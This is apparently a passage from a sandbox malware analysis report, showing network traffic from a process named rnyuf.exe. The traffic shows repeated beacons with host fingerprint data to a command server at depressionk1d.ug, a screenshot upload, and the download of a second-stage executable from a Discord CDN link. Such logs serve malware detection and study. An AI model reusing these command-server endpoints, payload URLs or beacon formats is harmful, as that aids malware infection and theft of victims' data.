                          Nov 12, 2021 22:23:54.259182930 CET8062OUTData Raw: 1d c8 50 67 31 ec 90 15 65 23 95 c0 3f 74 0e 46 7d eb 95 8f 52 bf 8a dd ed e3 bd b9 48 5d 76 bc 6b 2b 05 61 e8 46 70 45 74 47 0d 2b dd b2 25 88 8d ac 91 56 92 8a 2b b4 e4 14 51 45 14 c0 2b e9 3f 83 cc bf f0 85 6d c8 dc 26 04 8f 63 1a 7f 81 af 9b
                          Data Ascii: Pg1e#?tF}RH]vk+aFpEtG+%V+QE+?m&c+oK>\Xr;+c*G:5)vRK[_f}+/5KHlb}(z9rZa{6>(Ucw5<OAK')uU+/ts`
                          Nov 12, 2021 22:23:54.281778097 CET8084OUTData Raw: 83 14 62 81 45 30 b8 53 85 36 94 1a 04 28 eb 4e 1d e9 b4 b4 d0 85 a2 8a 5a 64 8b 8a 4c 52 81 4a 06 29 d8 06 e2 8a 53 49 40 20 a2 92 8a 40 14 b4 52 1a 00 5a 51 40 a2 98 0b 4b 49 4a 29 88 5a 33 49 45 08 43 b3 40 eb 40 a3 35 40 3a 8a 6e 68 14 13 61
                          Data Ascii: bE0S6(NZdLRJ)SI@ @RZQ@KIJ)Z3IEC@@5@:nhaii(0RRZJZhLS@C:)BSiEQ,uQNuQ#<*1OH<RMU:uM~itj-f8dvjM3N8h<8isLlJ8Pi.h0Pib@iA
                          Nov 12, 2021 22:23:54.281857014 CET8114OUTData Raw: a8 66 88 72 f5 a7 e6 9a 29 d5 0c d1 0f 53 c5 79 17 c4 f0 16 f2 c7 1f f3 cd ff 00 f4 2a f5 b1 d4 d7 91 fc 4e 3f e9 d6 3f f5 c9 bf f4 2a d2 87 c4 45 53 c7 5a 35 63 92 29 04 29 e9 52 62 94 57 2f 2a 3d 2e 66 33 ca 5e 3d a9 db 17 76 71 cd 2d 19 a7 64
                          Data Ascii: fr)Sy*N??*ESZ5c))RbW/*=.f3^=vq-dbhN!] @7n4Z9P(t0hVBJ!@sE93Ri)c<Dx*J)rc1(nqO ``PFFHD~D#KIF=*c4yIOvBx
                          Nov 12, 2021 22:23:54.304456949 CET8129OUTData Raw: 85 cd 04 d3 73 49 9a 2e 3b 0e a3 34 ca 5a 43 b0 b9 a3 b5 25 14 00 a6 92 92 97 b5 20 0c d2 e6 9b 49 40 0f cd 14 dc d1 40 0b 45 25 14 00 ec d3 68 a2 80 0a 5a 4a 33 45 c0 29 69 39 a2 81 87 7a 5c d2 51 40 8a d4 51 45 62 6c 7a 8f c0 6f f9 1e 6f 7f ec
                          Data Ascii: sI.;4ZC% I@@E%hZJ3E)i9z\Q@QEblzoo2*dUiS#k{`?dUEbs5IwzxO'XJc5|Uea?U5/F|i(E}-%-[Yu[Yb?GgGG
                          Nov 12, 2021 22:23:54.329431057 CET8129INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:54 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37
                          Nov 12, 2021 22:23:54.342771053 CET8130OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:54.368699074 CET8130INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:54 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          171192.168.2.449956178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:54.562738895 CET8131OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:54.588416100 CET8131INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:54 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          172192.168.2.449957178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:54.750503063 CET8132OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:54.776216984 CET8132INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:54 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          173192.168.2.449958178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:54.779565096 CET8132OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5
                          Host: depressionk1d.ug
                          Content-Length: 106671
                          Cache-Control: no-cache
                          Nov 12, 2021 22:23:54.779675007 CET8133OUTData Raw: 2d 2d 2d 2d 2d 2d 64 62 31 61 31 31 38 32 39 30 35 34 33 65 62 61 33 66 33 31 37 30 66 64 34 32 66 32 62 38 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------db1a118290543eba3f3170fd42f2b8f5Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:23:54.818923950 CET8143OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:23:54.819127083 CET8145OUTData Raw: c9 35 0e b5 35 bb 21 ce 2b a9 95 45 49 34 7e 54 f2 47 9c ec 62 b9 f5 c5 47 5a 27 72 82 8a 5a 28 01 28 a5 a2 80 12 96 97 14 62 80 12 8a 5a 3b d0 02 51 4b 45 31 06 28 a0 52 d1 60 12 8a 5a 50 29 88 4c 52 d1 8a 0d 00 14 51 8a 5a 00 4c 51 8a 5c 51 8a
                          Data Ascii: 55!+EI4~TGbGZ'rZ((bZ;QKE1(R`ZP)LRQZLQ\QaqR@%((4QJ)h1@KEc4SbF(\e.=iamR,.(cq.)hIv(Qv))X.'4sF(Z9ME4\PE6Z)XbQKE%Q`REJ)iCI
                          Nov 12, 2021 22:23:54.841941118 CET8162OUTData Raw: 42 41 c1 e0 f2 2b ca a9 1e 6a 95 17 9a fc 91 ee aa 9e ce 96 1e 76 4e d1 7b ff 00 8e 64 1a 07 87 e1 d2 2d 33 2a c7 2d ec 8c 64 9a 6c 64 ee 3d 81 3c e0 74 1f 9d 2d c7 85 f4 bb 99 fc c6 8a 55 46 90 48 f0 47 33 2c 4e c3 9c b2 03 82 6b 8a 3a ff 00 88
                          Data Ascii: BA+jvN{d-3*-dld=<t-UFHG3,Nk:,v\]Gw$V5g]/'7mB&f\c/gr34"NlbI?Z"0Lt?EWqQ@%PRS(J3@Q
                          Nov 12, 2021 22:23:54.842015028 CET8171OUTData Raw: 7d a9 0a 66 a7 90 6a a1 9e d1 54 46 2a d3 68 b3 51 18 aa 5d 33 48 d5 33 4c 75 1b 47 c5 69 34 35 13 43 58 ca 99 b4 6a 99 6f 15 40 d1 d6 a3 c5 50 3c 55 cf 3a 67 44 2a 99 a5 71 4c 2b 57 9e 2a 81 d2 b0 94 2c 74 46 77 2a 91 4d c5 4e 56 98 56 b3 71 34
                          Data Ascii: }fjTF*hQ]3H3LuGi45CXjo@P<U:gD*qL+W*,tFw*MNVVq4R#HE&*lUc~)Q`JQI\@($2iZm.+"o7;0ROfT(%(p vi)(!L\PzR8\hC@cMa(sQN,Uzm]GCd@S*t+\
                          Nov 12, 2021 22:23:54.865289927 CET8193OUTData Raw: 9a 70 aa 44 b1 f4 52 52 d5 12 38 53 81 a6 0a 75 52 25 a2 50 78 a7 e6 a2 06 9c 0d 5a 64 34 48 0d 3c 1a 88 1e 69 cb 56 99 0d 13 03 4f 06 a1 14 fc d5 a6 66 d1 26 68 06 99 9a 50 6a ae 2b 12 06 a7 87 a8 41 a7 83 4d 32 5a 25 0f ef 4f 0f 50 03 4a 0d 51
                          Data Ascii: pDRR8SuR%PxZd4H<iVOf&hPj+AM2Z%OPJQ%!ETPjpErrMS;u#<zNJy^]67N*h+IlFf!Ua9T]H4k*zp)U4aD{STQ{8VHma=8/lNt.8
                          Nov 12, 2021 22:23:54.865381002 CET8222OUTData Raw: 34 fe b0 fb 69 7b 7e 2f fe 1f fe 18 1e 1d 5e d7 fe bf ad 3d 4e 7e 2d 1b 55 9a c1 6f e2 d2 ef a4 b3 66 08 b7 09 6e e6 32 c4 ed 00 30 18 ce 78 c7 af 15 0c 76 37 93 cc f0 c3 69 71 24 a8 c1 1e 34 89 8b 2b 16 0a 01 00 64 12 c4 0c 7a 9c 56 ef 8a b4 dd
                          Data Ascii: 4i{~/^=N~-Uofn20xv7iq$4+dzVrMf]o4Ffr3[lqx[RSR=+]v/CIa.usFXzqU5'4/."{6FUf<x:j:h%i
                          Nov 12, 2021 22:23:54.888008118 CET8225OUTData Raw: 41 26 9f 9d c5 ce ff 00 0b 1a fe 2b be b6 d5 3c 61 ac 5f d9 49 e6 db 5c 5d 3c 91 3e d2 bb 94 9e 0e 08 04 7e 35 91 49 4a 29 c2 2a 11 51 5d 09 93 bb b9 d2 78 3b 52 b6 d3 67 d5 c5 c5 ed 9d 9b dd 69 cd 04 32 5e db 1b 88 77 f9 b1 b6 19 02 3e 46 15 ba
                          Data Ascii: A&+<a_I\]<>~5IJ)*Q]x;Rgi2^w>FeM)j{[nb[yVuP0UH!0OL4TwQwhu:I't*wOzS-|U%,/#-c-f8\=%>VIytY)o$k+x<
                          Nov 12, 2021 22:23:54.888046980 CET8230OUTData Raw: 00 a2 92 8a 00 5a 51 49 45 00 29 a2 92 8a 62 17 bd 14 0a 28 00 a5 a4 a2 80 16 8a 4c d2 8a 04 2f 34 51 cd 14 c0 28 a4 26 8c d0 16 16 8a 4c d1 4a e0 2e 45 19 a4 a2 9d c0 75 19 a4 a2 8b 88 5a 28 a2 80 0a 28 a2 80 14 52 d2 52 d3 10 a2 81 49 4b 40 82
                          Data Ascii: ZQIE)b(L/4Q(&LJ.EuZ((RRIK@(@hZ(Km(4m!RRsI(4RRM-.ii!h3MGjfiApi4&hG\pi4fnhfhXq4pnhfp4p
                          Nov 12, 2021 22:23:54.888091087 CET8238OUTData Raw: 05 ac 09 37 98 a2 2f 92 e7 25 a3 54 e4 b1 7f 95 8f dd af 33 d8 0f 6a 36 0c 74 ac 95 36 95 af fd 2d bf e0 f7 2f 9d 76 fe ba ff 00 c0 ec 7a 55 cd b6 a2 9e 30 d6 75 fb 91 21 f0 d4 d6 77 0b 15 d9 e2 de 6b 76 88 88 61 46 3c 16 07 60 08 39 05 4f 03 69
                          Data Ascii: 7/%T3j6t6-/vzU0u!wkvaF<`9OibC9?`9mr1.nsp3&J=M_\b}wu9cxzkVW*}?|,(]\_35in
                          Nov 12, 2021 22:23:54.913418055 CET8241INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:54 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          174192.168.2.449959178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:54.919496059 CET8242OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:54.945357084 CET8242INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:54 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          175192.168.2.449960178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:55.114799023 CET8243OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:55.140536070 CET8244INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:55 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          176192.168.2.449961178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:55.338565111 CET8244OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:55.364486933 CET8245INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:55 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          177192.168.2.449962178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:55.384706020 CET8245OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5
                          Host: depressionk1d.ug
                          Content-Length: 106671
                          Cache-Control: no-cache
                          Nov 12, 2021 22:23:55.384793997 CET8245OUTData Raw: 2d 2d 2d 2d 2d 2d 64 62 31 61 31 31 38 32 39 30 35 34 33 65 62 61 33 66 33 31 37 30 66 64 34 32 66 32 62 38 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------db1a118290543eba3f3170fd42f2b8f5Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:23:55.384983063 CET8255OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:23:55.385163069 CET8258OUTData Raw: c9 35 0e b5 35 bb 21 ce 2b a9 95 45 49 34 7e 54 f2 47 9c ec 62 b9 f5 c5 47 5a 27 72 82 8a 5a 28 01 28 a5 a2 80 12 96 97 14 62 80 12 8a 5a 3b d0 02 51 4b 45 31 06 28 a0 52 d1 60 12 8a 5a 50 29 88 4c 52 d1 8a 0d 00 14 51 8a 5a 00 4c 51 8a 5c 51 8a
                          Data Ascii: 55!+EI4~TGbGZ'rZ((bZ;QKE1(R`ZP)LRQZLQ\QaqR@%((4QJ)h1@KEc4SbF(\e.=iamR,.(cq.)hIv(Qv))X.'4sF(Z9ME4\PE6Z)XbQKE%Q`REJ)iCI
                          Nov 12, 2021 22:23:55.407282114 CET8261OUTData Raw: 42 41 c1 e0 f2 2b ca a9 1e 6a 95 17 9a fc 91 ee aa 9e ce 96 1e 76 4e d1 7b ff 00 8e 64 1a 07 87 e1 d2 2d 33 2a c7 2d ec 8c 64 9a 6c 64 ee 3d 81 3c e0 74 1f 9d 2d c7 85 f4 bb 99 fc c6 8a 55 46 90 48 f0 47 33 2c 4e c3 9c b2 03 82 6b 8a 3a ff 00 88
                          Data Ascii: BA+jvN{d-3*-dld=<t-UFHG3,Nk:,v\]Gw$V5g]/'7mB&f\c/gr34"NlbI?Z"0Lt?EWqQ@%PRS(J3@Q
                          Nov 12, 2021 22:23:55.407321930 CET8264OUTData Raw: 7d 09 7c 37 64 c0 4c 62 b2 31 33 74 ce dd a3 35 e6 92 6a be 26 89 ee 12 6b fd 5d 1e db fd 7a bc b2 83 17 38 f9 b2 7e 5e 48 1c f7 35 9d 75 7f 79 7d b7 ed 77 73 dc 6c ce df 3a 42 fb 73 d7 19 fa 54 41 4d 38 b4 f4 45 4a 51 b3 d3 56 6b 26 b7 0b 7d f8
                          Data Ascii: }|7dLb13t5j&k]z8~^H5uy}wsl:BsTAM8EJQVk&}~5^U_TuG`k<"Y0[djXI$cauw>Iz}kv{=20i)Om5!erlyA7qo.C[c?#\|R^Y]
                          Nov 12, 2021 22:23:55.407354116 CET8266OUTData Raw: e7 4f bf 96 7d 42 39 a5 2b 69 2e c9 54 40 01 62 30 14 2f 0d 97 3b b3 9c 0a e7 fc 1d a5 6a 53 2a eb 76 d6 5a 8d f4 5a 6d cc 52 25 ad 94 2d 23 4b 38 cb 26 ed a0 ed 51 b7 96 eb c8 03 ae 47 2e 61 43 da 94 c6 a7 1c 74 aa f6 52 bb 77 df fc ee 43 a9 17
                          Data Ascii: O}B9+i.T@b0/;jS*vZZmR%-#K8&QG.aCtRwCechMw+>y_o\sS5_od.+,i;xQsqRqk^_/6Gc[?rXciNr9,8bH*SqRR;4fb
                          Nov 12, 2021 22:23:55.407361984 CET8268OUTData Raw: 4a 00 43 4c 27 34 e2 73 4d a4 c6 86 56 cf 86 7f e4 25 27 fd 71 3f cc 56 2d 6d 78 67 fe 42 52 7f d7 13 fc c5 6b 85 fe 34 4c b1 7f c1 91 d5 d6 ff 00 87 3c 21 a9 f8 96 4d d6 c8 23 b6 53 87 b8 93 ee 83 e8 3d 4d 65 e9 96 2f a9 ea 96 d6 48 42 99 a4 09
                          Data Ascii: JCL'4sMV%'q?V-mxgBRk4L<!M#S=Me/HBQ=uG1PimFU'j^7:Q=pXxUwek->uBHwh-$c>*%K+ l=1^Khh.Fz5Zu$(bi
                          Nov 12, 2021 22:23:55.407368898 CET8269OUTData Raw: 92 8a 00 08 a4 c7 b5 2e 68 ce 68 d0 04 c7 14 52 d2 50 02 13 c5 34 d2 d2 54 94 36 93 bd 3e 93 bd 21 91 56 cf 86 7f e4 25 27 fd 71 3f cc 56 35 74 be 08 d3 2f 75 6d 6e 5b 6b 08 1a 79 85 bb 3e c5 20 1c 06 5f 5f ad 69 87 92 8d 58 b9 3b 23 3c 4c 5c a9
                          Data Ascii: .hhRP4T6>!V%'q?V5t/umn[ky> __iX;#<L\IE]Hb2b0J/x<I *>(LzcK|s9I;;>Yueu_7$'Yz:,rlt
                          Nov 12, 2021 22:23:55.407388926 CET8272OUTData Raw: 8a 5a 5c 53 24 4c 52 81 4a 05 2e 29 89 b1 b4 62 9f 8a 31 45 85 71 98 a5 c5 3b 14 b8 a7 60 b8 dc 51 b6 9f 8a 5c 53 b0 ae 33 6d 1b 6a 4d b4 6d a7 61 73 11 ed a3 6d 4b 8a 36 d1 ca 1c c4 3b 28 2b 53 ed a4 db 4f 94 39 88 0a d3 4a d5 82 b4 85 2a 79 46
                          Data Ascii: Z\S$LRJ.)b1Eq;`Q\S3mjMmasmK6;(+SO9J*yFV+M)VJJTVI)HVV+L)RZ9ZiiSL"""RM"&0LSIRUE!PwE!Ph7CJ*|lx_BJ:5i1|xss7RM
                          Nov 12, 2021 22:23:55.407407045 CET8274OUTData Raw: 55 6d 3a 39 6d 6d 34 c3 76 3c 3b 2c e8 f7 b1 c1 e5 f9 a2 f8 a6 f6 33 7c 99 db f2 e5 bb 71 5c 6d dd e5 c5 fd c9 b8 b9 31 6f 20 28 58 a1 48 91 40 ec 11 00 55 1f 41 4f 1a 96 a2 b6 e6 d9 6e b1 01 b5 36 65 3c b5 ff 00 52 64 f3 4a e7 19 fb fc e7 af 6c
                          Data Ascii: Um:9mm4v<;,3|q\m1o (XH@UAOn6e<RdJl$heJZ.'<-'aU[*S,07EWu.~PskKm\y$/4I(6%f\tw7Vr[bi#@xl z-$Ke8K.#$dT
                          Nov 12, 2021 22:23:55.478281021 CET8355INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:55 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          178192.168.2.449963178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:55.504213095 CET8356OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:55.529405117 CET8356INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:55 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          179192.168.2.449964178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:55.699477911 CET8357OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:55.726066113 CET8357INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:55 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          18192.168.2.449799162.159.129.23380C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:18.601067066 CET2416OUTGET /attachments/878034206570209333/908810886561534042/slhost.exe HTTP/1.1
                          Host: cdn.discordapp.com
                          Nov 12, 2021 22:23:18.630228996 CET2417INHTTP/1.1 301 Moved Permanently
                          Date: Fri, 12 Nov 2021 21:23:18 GMT
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Cache-Control: max-age=3600
                          Expires: Fri, 12 Nov 2021 22:23:18 GMT
                          Location: https://cdn.discordapp.com/attachments/878034206570209333/908810886561534042/slhost.exe
                          X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
